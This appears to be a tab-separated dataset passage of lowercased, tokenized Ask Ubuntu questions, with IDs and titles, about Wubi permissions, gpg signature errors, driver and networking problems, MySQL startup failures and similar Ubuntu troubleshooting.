sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 03:00.0 network controller : intel corporation pro/wireless 5100 agn [ shiloh ] network connection 15:00.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev ba ) 15:00.1 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 04 ) 15:00.2 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 21 ) 15:00.3 system peripheral : ricoh co ltd r5c843 mmc host controller ( rev ff ) 15:00.4 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 11 ) 15:00.5 system peripheral : ricoh co ltd xd-picture card controller ( rev 11 ) supported interface modes : * ibss * managed * monitor
195464	how to change file permission from ubuntu wubi install	i am new to ubuntu and linux . i have a wubi installation within windows 7 . the issue i am having is that i ca n't seem to modify windows files from ubuntu . i can access and see all the files and folders but i ca n't for example make a new folder in the windows files/folders ( permission denied ) but i can save documents , etc . to existing folders . is there a way of doing this ?
195468	program/wrapper ( how do you call it ) to automate a certain script	in this question a script is provided , that minimizes all the other windows except the active one . but the thing is , to trigger this script a ( shortcut ) key-combination has to be pressed . i would love it , if it would be possible to automate this behavior , i.e . no matter what i do , only the active window is not minimized . this way i can not view more then one open window at the same tine , which is what i 'm after . is it possible to write a script , that does this ? i a question i asked a while ago ( where i learned about the above script ) , someone said , the proper way to do this , would be through a wrapper through which every program starts . i would also be very happy with a more sloppy solution , like activating this script 100 times per second ( simulating pressing the shortcut combination a 100 times per second ) , if it is feasible - although i was warned , that that may not be a very good idea .
195480	what happens to the storage capacity when i uninstall ubuntu ?	i used the wubi installer for ubuntu 12.04 . after having trouble with getting the ubuntu to boot , i tried uninstalling it with wubi . from 'my computer ' ( in windows 7 ) , i noticed the maximum capacity of my hard drive drop from 256gb to 238gb . i have tried using some methods with the command prompt to locate the missing storage , but windows now only recognizes that the storage on the disk to have 238gb instead of the original 256gb . is there any way to recover that memory ?
195485	how to list arecords available formats	i built a tool that uses arecord , but now i noticed that it does n't work on some computers , as the format is n't supported by that hardware , how can i see/list what formats thats supported ? arecords man page says : -f -- format=format sample format recognized sample formats are : s8 u8 s16_le s16_be u16_le u16_be s24_le s24_be u24_le u24_be s32_le s32_be u32_le u32_be float_le float_be float64_le float64_be iec958_subframe_le iec958_subframe_be mu_law a_law ima_adpcm mpeg gsm special s24_3le s24_3be u24_3le u24_3be s20_3le s20_3be u20_3le u20_3be s18_3le s18_3be u18_3le some of these may not be available on selected hardware
195489	added key , but dget still shows `` gpg : ca n't check signature : public key not found ''	trying to download django source package using dget and the .dsc file from here . then dget fails to verify the source , because it is missing a public key . $ dget https : //launchpad.net/ubuntu ... [ ... ] dscverify : python-django_1.4.1-2.dsc failed signature check : gpg : signature made tue 21 aug 2012 09:12:04 cest using rsa key id f2ac729a gpg : ca n't check signature : public key not found validation failed ! ! fine , i added this key to my keyring , because i think i can trust this one : $ gpg -- keyserver keyserver.ubuntu.com -- recv-key 0xf2ac729a gpg : requesting key f2ac729a from hkp server keyserver.ubuntu.com gpg : key f2ac729a : `` raphaël hertzog < raphael @ ouaza.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 ( well , this output is run afterwards , when it was already in my keyring ) and it is really there : $ gpg -- fingerprint f2ac729a pub 4096r/f2ac729a 2009-05-07 key fingerprint = 3e4f b711 7877 f589 dbcf 06d6 e619 045d f2ac 729a uid raphaël hertzog < raphael @ ouaza.com > uid raphaël hertzog ( debian ) < hertzog @ debian.org > uid raphaël hertzog ( freexian sarl ) < raphael @ freexian.com > sub 2048r/71f23dee 2009-05-07 but still fails for the same reason : gpg : signature made tue 21 aug 2012 09:12:04 cest using rsa key id f2ac729a gpg : ca n't check signature : public key not found i 'm running all these commands as my regular user . i also tried adding this key to apt 's keyring and root 's keyring . both to no avail . what am i missing here ?
195491	how to compile old c++ programs on	i am taught the old version of c++ in school , the one which uses iostream.h instead of iostream . i wanted an ide which helps me compile the programs in that old style c++ . and i cant use iostream and namespace stuff . i just need a compiler that can compile the old style codes .
195493	blue yeti usb microphone with chrubuntu 12.04	as the title says i 'm using chrubuntu on my chromebox and i really want to use my blue yeti ( which is supposedly driver free ) microphone with it , but the only thing that shows up as an input is internal microphone , which is no use . the light on the microphone is on but that 's as far as i get . help would be much appreciated .
195495	disable css warnings	everytime i open a gtk application it outputs css warnings ( lack of units assuming px etc ) . can i disable this dreadful verbosity ? example : $ gedit ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:3:14 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:52:20 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:72:19 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:102:14 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:102:16 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:105:20 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:129:16 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:130:17 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:141:20 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:142:19 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:149:14 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:168:19 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:169:20 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:182:19 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:196:20 : not using units is deprecated . assuming 'px ' . ( gedit:19558 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:207:19 : not using units is deprecated . assuming 'px ' .
195499	how to install networkmanager-0.9.0.tar.bz2 package on 10.10 ?	bapi @ ubuntu : ~ $ cd downloads bapi @ ubuntu : ~/downloads $ cd networkmanager-0.9.0 bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ make make : *** no targets specified and no makefile found . stop . bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking how to create a ustar tar archive ... gnutar checking whether to disable maintainer-specific portions of makefiles ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking whether gcc and cc understand -c and -o together ... yes checking for g++ ... no checking for c++ ... no checking for gpp ... no checking for acc ... no checking for cc ... no checking for cxx ... no checking for cc++ ... no checking for cl.exe ... no checking for fcc ... no checking for kcc ... no checking for rcc ... no checking for xlc_r ... no checking for xlc ... no checking whether we are using the gnu c++ compiler ... no checking whether g++ accepts -g ... no checking dependency style of g++ ... none checking build system type ... i686-pc-linux-gnu checking host system type ... i686-pc-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert i686-pc-linux-gnu file names to i686-pc-linux-gnu format ... func_convert_file_noop checking how to convert i686-pc-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no checking for ansi c header files ... ( cached ) yes checking fcntl.h usability ... yes checking fcntl.h presence ... yes checking for fcntl.h ... yes checking paths.h usability ... yes checking paths.h presence ... yes checking for paths.h ... yes checking sys/ioctl.h usability ... yes checking sys/ioctl.h presence ... yes checking for sys/ioctl.h ... yes checking sys/time.h usability ... yes checking sys/time.h presence ... yes checking for sys/time.h ... yes checking syslog.h usability ... yes checking syslog.h presence ... yes checking for syslog.h ... yes checking for unistd.h ... ( cached ) yes checking for mode_t ... yes checking for pid_t ... yes checking whether time.h and sys/time.h may both be included ... yes checking whether gcc needs -traditional ... no checking for working memcmp ... yes checking for select ... yes checking for socket ... yes checking for uname ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.0 ... 0.41.1 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.10.1 checking for xml : :parser ... ok checking for msgfmt ... ( cached ) /usr/bin/msgfmt checking for gmsgfmt ... ( cached ) /usr/bin/msgfmt checking for xgettext ... ( cached ) /usr/bin/xgettext checking for msgmerge ... ( cached ) /usr/bin/msgmerge checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for shared library run path origin ... done checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking whether byte ordering is bigendian ... no checking for /etc/redhat-release ... no checking for /etc/suse-release ... no checking for /etc/fedora-release ... no checking for /etc/gentoo-release ... no checking for /etc/debian_version ... yes checking for /etc/arch-release ... no checking for /etc/slackware-version ... no checking for /etc/frugalware-release ... no checking for /etc/mandriva-release ... no checking for /etc/pardus-release ... no checking for /etc/linexa-release ... no checking for /etc/exherbo-release ... no checking linux wireless extensions > = 18 ... yes checking for cos in -lm ... yes checking for dladdr in -ldl ... yes checking for dbus_glib_global_set_disable_legacy_property_access in -ldbus-glib-1 ... no checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for dbus ... no configure : error : package requirements ( dbus-1 > = 1.1 dbus-glib-1 > = 0.75 ) were not met : no package 'dbus-1 ' found no package 'dbus-glib-1 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables dbus_cflags and dbus_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ pkg-config must specify package names on the command line bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ pkg-config networkmanager-0.9.0 bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ pkg-config man bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ pkg-config man page bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ make make : *** no targets specified and no makefile found . stop . bapi @ ubuntu : ~/downloads/networkmanager-0.9.0 $ sudo make installmake : *** no rule to make target `install ' . stop .
195503	how to disable right click in nautilus ?	i want to disable right click in nautilus using ubuntu 12.04. how to do that ?
195504	setting folder permission so it is n't deletable , but everything else is allowed	i want to set permissions to a folder such that , when i 'm normally logged in ( meaning not as root ) , this folder is n't deletable , but i can still change the name of this folder and move in around in my system ? is this possible and if yes , how to set the permission ? i already tried different combinations for the permissions but could n't figure out how to do it . also ( side question ) , if some folder hast some permission set and i copy this folder , along with its contents ( assuming i am allowed to read it ) to a memory , are these permission preserved ? i suppose not , since under windows i could delete the folder on the stick , even if under ubuntu it is n't allowed to delete it ...
195507	how to prevent unity dash from taking keyboard control	issue summary : when using virtualbox ( vb ) in fullscreen mode , vb takes control of the screen . this means that even though the linux host desktop is locked i still am able to function in the guest os without having to log into the linux host ( when the screnesave lock comes on ) . the problem i have been faced with over the past few months is that whenever i lock the vb guest ( it 's windows , so i 'm using alt-l to lock it ) it activiates the unity dashboard in the background . what happens then is that when i come back to my computer i log into windows but the password is actually being written to the unity dashboard . i 've had it happen already a few times at work where i had people standing around and my password was exposed to them . expected behaviour - virtualbox should have control of the screen until i either minimize the vb or i close it completely . instead of this , sometimes the host os is taking over the keyboard in the background . i 'm not really sure whther this is a unty bug or a virtualbox bug . any thoughts on how to resolve this ( security ) issue ?
195512	wifi hardware disabled	i have ubuntu 12.04 and my problem is that the wifi is disabled . it says that the wifi hardware is disabled and it does not switch on when i switch on the wifi . the control always shows that wifi is switched off . the same computer has windows too and my wifi works just fine in it .
195513	are there ubuntu security notices feeds for specific releases	the ubuntu security notices web page has an option to show only notices for a single release . is there a way to get notices for a single release as a feed , without setting it up myself ? that is , is there an official feed containing all and only ubuntu 12.04 ( for example ) security notices ? the end goal is a tool which warns when any of a set of packages ( not necessarily the ones installed on a system ) for a single ubuntu release are affected by a security notice .
195515	how can i control dropbox sync programmatically ?	i have dropbox nautilus sync running . i want to programmatically pause sync , then do something to the directory , and then resume sync again . is there a way to pause and resume dropbox nautilus sync from the command line ?
195516	startup script for turning/disable monitor off and on	so this is a problem for me since i have two monitors set up for my ubuntu desktop . i 'm running ubuntu 12.04 . ok , so first when i installed ubuntu i had this problem with enabling the second monitor as at the same time not mirroring the two monitors . ubuntu did not now how to set the required resolution . i searched for an answer and got one fixing my problem . i simply edited my xorg.conf file and added a virtual size for my desktop , now with the virtuyal resolution of 3840 1080 . log out and back in and it works and i can now use both of my monitors . but , then after a few reboots , the secondary screen started to act weird . like for example , when i drag a window over to that screen , the contours sticks and it looks really strange ( a little like this if you know what i mean ) . so to get the secondary screen back to normal i have to go to the top right `` start button '' - > displays ... - > select secondary monitor - > turn it of - > apply - > keep configuration - > turn it on - > apply - > keep configuration . as you can imagine this is a little annoying and therefor it would be awsome if i could make a script that does this at every startup . a few commands for doing the same thing but in terminal would be all i need . hope you guys understand what i want to accomplish . i have a radeon hd7870 video card , so i use the drivers from ati/amd . i have catalyst center installed version 8.96.7-120312a-135598c-ati . my primary screen , wich works super is connected through dp and my secondary screen through vga . both 1920x1080 thanks in advance !
195520	shell extension is blank	in gnome tweak tool , shell extension is blank . there is no option for select the theme.how can i solve this problem . i attach the screen shot of gnome tweak tool .
195521	ubuntu 12.04.1 lts mysql failed to start	i have ubuntu 12.04 lts server which was running ok along with mysql service , i had to reboot the server without any changes made to system and since then mysql refuse to run . i have following error message below please advice thanks 22.022845 ] type=1400 audit ( 1349176528.410:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=793 comm= '' apparmor_parser '' oct 2 13:15:28 it-srv-mn12 kernel : [ 22.474857 ] init : mysql main process ( 876 ) terminated with status 1 oct 2 13:15:28 it-srv-mn12 kernel : [ 22.474901 ] init : mysql main process ended , respawning oct 2 13:15:29 it-srv-mn12 kernel : [ 23.214984 ] init : mysql post-start process ( 878 ) terminated with status 1 oct 2 13:15:29 it-srv-mn12 kernel : [ 23.446895 ] init : mysql main process ( 946 ) terminated with status 1 oct 2 13:15:29 it-srv-mn12 kernel : [ 23.446937 ] init : mysql main process ended , respawning oct 2 13:15:30 it-srv-mn12 kernel : [ 24.254699 ] init : mysql post-start process ( 947 ) terminated with status 1 oct 2 13:15:30 it-srv-mn12 kernel : [ 24.489266 ] init : mysql main process ( 984 ) terminated with status 1 oct 2 13:15:30 it-srv-mn12 kernel : [ 24.489307 ] init : mysql respawning too fast , stopped oct 2 13:15:58 it-srv-mn12 kernel : [ 51.421278 ] init : plymouth-upstart-bridge main process ( 758 ) killed by term signal oct 2 13:16:24 it-srv-mn12 kernel : [ 77.482282 ] audit_printk_skb : 24 callbacks suppressed oct 2 13:16:24 it-srv-mn12 kernel : [ 77.482286 ] type=1400 audit ( 1349176584.205:20 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=1613 comm= '' apparmor_parser '' oct 2 13:16:24 it-srv-mn12 kernel : [ 77.722406 ] init : mysql main process ( 1617 ) terminated with status 1 oct 2 13:16:24 it-srv-mn12 kernel : [ 77.722450 ] init : mysql main process ended , respawning oct 2 13:16:25 it-srv-mn12 kernel : [ 78.522680 ] init : mysql post-start process ( 1618 ) terminated with status 1 oct 2 13:16:25 it-srv-mn12 kernel : [ 78.531120 ] type=1400 audit ( 1349176585.253:21 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=1655 comm= '' apparmor_parser '' oct 2 13:16:25 it-srv-mn12 kernel : [ 78.764720 ] init : mysql main process ( 1659 ) terminated with status 1 oct 2 13:16:25 it-srv-mn12 kernel : [ 78.764762 ] init : mysql main process ended , respawning oct 2 13:16:26 it-srv-mn12 kernel : [ 79.559925 ] init : mysql post-start process ( 1660 ) terminated with status 1 oct 2 13:16:26 it-srv-mn12 kernel : [ 79.568938 ] type=1400 audit ( 1349176586.293:22 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=1698 comm= '' apparmor_parser '' oct 2 13:16:26 it-srv-mn12 kernel : [ 79.811874 ] init : mysql main process ( 1702 ) terminated with status 1 oct 2 13:16:26 it-srv-mn12 kernel : [ 79.811914 ] init : mysql respawning too fast , stopped
195529	ubuntu 12.04 fails to boot ?	and 12.04 bootinstalled 12.04 64 bit on my desktop which has an nvidia 6150se integrated graphics card . at first i had low graphics mode messages but eventually i obtained the login screen perhaps after up to three restarts . now it fails to boot at all . i tried to get the boot menu by holding the shift key but that does not work . is my only option to get a bootable cd ? i upgraded my system using update manager and telecharging 12.04 using a satellite link - i think there was a message about compiz during the telechargement . when i restarted the computer i eventually got a message about low level graphics mode but none of the options except the default appeared to work . i think the default is to continue in low grahics mode . eventually i got the login screen and changed the graphics driver to nvidia-current-updates . - this did not improve things so i tried the other option which i think is 173 with updates - this did not improve things either but i eventually , usually after one or more restarts , managed to get into the system and everything worked ok . i never managed to spot why it suddenly worked . i applied at least two updates using update manager . on monday when i started the computer it executed the bios then read the hard disk for less than one second and then hung with a message `` input not supported '' on the screen . the only input that works is ctrl+alt+del . ctrl+alt+t does not give a terminal screen presumably because unix is not active .
195531	how to start service in a chroot independently of the host system ?	i 'm using chroot to create arm ubuntu installation from ubuntu core image . if i mount /proc and /sys all started services intercept with host system ( trying to restart dbus is the worst thing it have yet tried ) . currently i 'm trying to work with only /dev mounted to chroot . this way service refuses to start jobs : # service resolvconf start start : job failed to start
195534	wired connection not being recognized	i 'm on ubuntu maverick ( 10.10 ) . i 've read a few threads regarding wired connection problems , but have n't found a solution yet . the problem appears after i connect to a wireless network . when i disconnect wireless and plug in an internet cable , the wired connection is not recognized at all . even the socket appears dead ( there are no diodes flashing ) . the only solution so far seems to be restarting the computer . network manager then tries to connect to a wi-fi , but the wired connection is listed and working . i 've tried sudo restart network-manager , but that does n't solve anything . after a while , available wireless networks start appearing , but the wired still does n't . any ideas ? thanks in advance . edit : here is the dmesg output after switching off wi-fi and then plugging the internet cable . [ 18200.623543 ] restarting tasks ... done . [ 18200.648422 ] video lnxvideo:00 : restoring backlight state [ 18200.707580 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.707715 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.707819 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.707922 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.708025 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.708127 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.708229 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.708332 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 18200.708824 ] sky2 0000:02:00.0 : eth0 : enabling interface [ 18200.709587 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 18202.662422 ] ext4-fs ( sda9 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 [ 18203.324061 ] ext4-fs ( sda9 ) : re-mounted . opts : errors=remount-ro , user_xattr , commit=0 [ 18211.193137 ] eth1 : no ipv6 routers present [ 18212.844649 ] usb 5-1 : new low speed usb device using ohci_hcd and address 5 [ 18213.017235 ] input : usb optical mouse as /devices/pci0000:00/0000:00:13.0/usb5/5-1/5-1:1.0/input/input16 [ 18213.017499 ] generic-usb 0003:0461:4d17.0004 : input , hidraw0 : usb hid v1.11 mouse [ usb optical mouse ] on usb-0000:00:13.0-1/input0 after system restart , dmesg says this : [ 19.802126 ] sky2 0000:02:00.0 : eth0 : enabling interface [ 19.802394 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 20.812533 ] device eth0 entered promiscuous mode [ 21.495547 ] sky2 0000:02:00.0 : eth0 : link is up at 100 mbps , full duplex , flow control rx [ 21.495677 ] sky2 0000:02:00.0 : eth0 : link is up at 100 mbps , full duplex , flow control rx [ 21.496574 ] addrconf ( netdev_change ) : eth0 : link becomes ready ( in reply to ugo ) here is what i tried : install wicd ( as described , adding the extra lines in /etc/network/interfaces ) . i connected to a wireless network , suspended the computer , resumed with the internet cable plugged in and disabled the wireless connection in wicd . the wired network still does not appear . after enabling `` always show the wired network '' in wicd preferences i tried to connect to the wired interface that showed up , but it failed at `` getting ip address '' . the same without adding the extra lines in /etc/network/interfaces . after enabling `` always show wired '' and pressing the connect button , it gets stuck at `` enabling interface '' . the dmesg output seems to be still the same . in both cases , it behaved the same way after unplugging the network cable . the eth0 interface was not even listed in ifconfig . even though it once seemed to be ok , it is not . the wired interface ( eth0 ) is listed in ifconfig , but not in wicd . dmesg says the same as above : ... [ 10156.025350 ] sky2 0000:02:00.0 : eth0 : phy i/o error [ 10156.025711 ] sky2 0000:02:00.0 : eth0 : enabling interface [ 10156.026463 ] addrconf ( netdev_up ) : eth0 : link is not ready so , unfortunately , this is still not resolved .
195536	how do i update the bios of a samsung series 9 ?	i 'm using a samsung series 9 900x3c and since there is a bios update available for this model ( unfortunately only with windows ) . i was wondering if anybody knows a good method to upgrade the bios without switching back to windows . i 'm using ubuntu 12.04 lts .
195538	how can i install gnome or gtk+ 3.6 on ubuntu 12.04 ?	is it possible to install gnome 3.6 or gtk+ 3.6 on ubuntu 12.04 ? if yes , how ? i want to write an application which uses gtkmenubutton . gtkmenubutton is a new widget introduced in gtk+ 3.6 .
195543	which graphics driver amd radeon 6400m	sorry if this has been answered before but after a lot of searching via google and phoronix.com . i 'm completely overloaded with information and pretty lost . i have a new laptop with an amd radeon 6400m card , and have a fresh installation of 12.04 64 bit . after checking the graphics in settings ( unknown driver ) and trying to install fglrx via the manager and then later the terminal , i 've ended up with the vesa sumo driver , which is n't optimal . is n't there an open source driver that is compatible with this card and provides decent 2d & 3d acceleration ? or will i be forced to fiddle around with the proprietary driver until i can finally get it working ( ended up with a black startup screen so far with that one ) . if you had n't noticed , i 'm pretty new to linux .
195544	swexx 5:1 sound card would it work with ubuntu 12.04 ?	i do use ubuntu in the laptop but unfortunatelly very limited it skills . using ubuntu was more a political decission than a practical one . i need to buy an external 5:1 sound card and i can not find a confirmation of any that would definitively work . does anybody know any or could advise me what to buy ? google seach was not very useful . thank you very much
195545	how to enable sftp support in curl ?	i have installed curl-7.27.0 and it is working fine how ever it is not working is run below command to find whether it is now , but it showed that : result of the command curl -v root @ ubuntu : ~/curl-7.27.0 # curl -v curl 7.21.6 ( i686-pc-linux-gnu ) libcurl/7.21.6 openssl/1.0.0e zlib/1.2.3.4 libidn/1.22 librtmp/2.3 protocols : dict file ftp ftps gopher http https imap imaps ldap pop3 pop3s rtmp rtsp smtp smtps telnet tftp features : gss-negotiate idn ipv6 largefile ntlm ssl libz
195551	is there a ubuntu network hacking derivative ?	is there a ubuntu derivative who have facilities like network hacking that developed by community / unofficial ubuntu derivatives ?
195552	how to impose memory limits to a shell script ?	i have a php script that while a folder contains xml files , it will process them onto the database . currently , the server is running the php version 5.3.10 and there 's a bug report about memory issues triggered by zend_mm_heap within a loop . this causes the php to not free memory properly , thus leading to an error and a script crash : zend_mm_heap is corrupted some solutions are found , but i do n't have access to the server settings . to deal with this , i 've prepared the following bash to take care of the loop , leaving the php script only responsible by processing the xml file : # ! /bin/bash # check for files to process # if files are present , call # the php script dir= '' /path/to/dir/with/files '' while [ `` $ ( ls -a $ dir ) '' ] ; do php /path/to/php/script/myscript.php done my goal now is to have this bash memory allocation limited ( memory and virtual memory ) , thus preventing it to hang the system if something goes wrong . my question is : how can i limit the memory used by this shell script to a specific amount ?
195557	gui and c coding gtk files ?	i am trying to write a program in c and i need the gtk/gtk.h file , which i both currently do n't appear to have nor am i sure how to get it . when i compile all i get is can not find the file , how can i resolve this issue ?
195561	how to install java plug-in ?	webex complains that java is not working and that the plug-in needs to be enabled , but the plug-in is not in tools > add-ons . search all add-ons and ubuntu software center are not able to find the java plug-in for firefox . how is the java plug-in for firefox installed on ubuntu 10.04 , or is there a workaround for installing webex ?
195564	harddisk sharing for windows and ubuntu user	i have a 250gb partition of harddisk . i want to share this partition for another computer in my house ( for windows user and ubuntu user ) . what software did i need ? actually i find a software named `` samba '' . but is the software share harddisk to windows users ? and can i share the harddisk through wireless connection ? is the software work on ubuntu desktop ( not the server ) and is it has graphical user interface ? thank you for any answers .
195565	how to install flareget_1.0-1 ( beta ) _deb_rpm.tar.gz ?	i wanted to install flarget . i visted the website and dowloaded the the file flareget_1.0-1 ( beta ) _deb_rpm.tar.gz and saved it in the location /home/suhailcholassery/download/flareget_1.0-1 ( beta ) _deb_rpm.tar.gz how do i go about installing it ? i tried typing the following command in terminal as per the readme 's instruction enclosed in file . yum install flareget-1.0-1.i386.rpm but the reply was the following : you need to be root to perform this command and i do n't know how that is to be done . is n't there any simpler way for installing this package ?
195566	getting ethernet driver to crippled machine	the reply at how do i install drivers for the atheros ar8161 ethernet controller ? probably helps me . i have a toshiba s855 , bought yesterday . lspci -vv | grep atheros command from the terminal shows me i have the ar8161 gigabit ethernet controller ( rev 10 ) however the answer sudo apt-get install ... requires an internet connection . how can i , using another machine , capture the necessary information on that other machine to copy across to the crippled machine , and then how do i build from there . thanks in anticipation
195570	removing nvidia drivers without killing kubuntu-desktop ( kubuntu 12.04 )	i am trying to install cuda drivers on kubuntu 12.04 , but in order to do so i need to remove nvidia drivers ( which come in with the distro ) . the problem i have is that while doing so it also removes kubuntu-desktop , which is disasterous ( though cuda installs ok ) . i had the same problem when trying linux mint 13 kde . i followed the link here : http : //sn0v.wordpress.com/2012/05/11/installing-cuda-on-ubuntu-12-04/ and noticed that some people have come across this problem as well , but no solution has been found yet - except for not installing the cuda , lol . i also tried this : sudo apt-get purge nvidia-common only to get the same warning of being about to remove the desktop : reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : kubuntu-desktop nvidia-common 0 upgraded , 0 newly installed , 2 to remove and 435 not upgraded . after this operation , 197 kb disk space will be freed . do you want to continue [ y/n ] ? n my question is - can you remove the nvidia drivers in a way that does not remove kubuntu-desktop ( or ubuntu-desktop ) at the same time ? or do i have to go with killing the desktop and then install the it again after cuda is installed ? would n't it affect other apps , which depend on kubuntu-desktop ? i need cuda for my cg work and so any help would be really welcome , thanks !
195576	how to get gui for ubuntu 12.04 server ?	i am using ubuntu 12.04 server on virtual box . hi i know we can add gui to a server install with ubuntu-desktop and similarly xubuntu , lubuntu , kubuntu , but i want something else . my requirement is only one thing , a basic gui with as possible as best low memory consumption .
